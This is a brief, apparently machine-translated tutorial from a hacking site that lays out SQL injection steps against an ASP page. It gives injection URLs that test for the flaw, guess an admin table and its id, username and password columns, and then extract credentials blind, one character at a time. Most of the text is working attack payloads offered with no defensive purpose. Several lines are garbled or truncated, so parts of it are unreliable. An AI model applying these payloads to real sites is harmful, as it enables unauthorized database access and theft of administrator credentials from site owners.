Major steps for SQL Injection

Http://www.spking.com/

I wrote it very briefly, but I should be able to understand it! No such questions will be answered in the future! Please do not transfer your post. It is not a NB technology. It is almost a dead thing, for fear of shame!

Step 1:
Asp? Id = 259 "> http://www.aaa.com/./show.asp? Id = 259
Http://www.aaa.com/./show.asp? Id = 259 and 1 = 1
Http://www.aaa.com/./show.asp? Id = 259 and 1 = 2
Simple Determination of Injection

Step 2:
Guess the administrator login interface! Admin. asp, admin_admin.asp, etc. If you cannot guess it, hurry up and think of another way out! You can guess again:
Http://www.aaa.com/./show.asp? Id = 259% 20and % 20 exists % 20 (select % 20 * % 20 from % 20 admin)
Then I guess which table the login account exists in. Here I guess it is admin. (Assuming)

Step 3:
Next is the key! You can guess the fields in the admin table. The following three items are the guesses about the existence of id, username, and password (assuming they all exist ). You can guess the field based on the variable name on the login interface above!
Http://www.aaa.com/./show.asp? Id = 259% 20and % 20 exists % 20 (select % 20id % 20 from % 20 admin)
Http://www.aaa.com/./show.asp? Id = 259% 20and % 20 exists % 20 (select % 20 username % 20 from % 20 admin)
Http://www.aaa.com/./show.asp? Id = 259% 20and % 20 exists % 20 (select % 20 password % 20 from % 20 admin)

Step 4:
Http://www.aaa.com/./show.asp? Id = 259% 20and % 20 exists % 20 (select % 20id % 20 from % 20 admin % 20 where % 20id = 1)
I guess what the admin ID is. Pay attention to the syntax format I used. Here we assume that the ID is 1.

Http://www.aaa.com/./show.asp? Id = 259and % 20 exists % 20 (select % 20id % 20 from % 20 admin % 20 where len (username) = 6% 20and % 20id = 1)
Check whether the length of username is 6.

110% 20and % 20id = 1 "> http://www.aaa.com/./show.asp? Id = 259% 20 exists % 20 (select % 20id % 20 from % 20 admin % 20 where % 20asc (mid (username, 110%)> 20and % 20id = 1)
Then I guess what the user name is, and sometimes the mid is not used, so I usually directly use the left function to guess, for example:
Http://www.aaa.com/./show.asp? Id = 259% 20 exists % 20 (select % 20id % 20 from % 20 admin % 20 where % 20 left (username, 1) =)

Step 5:
Repeat Step 5 to change username to password.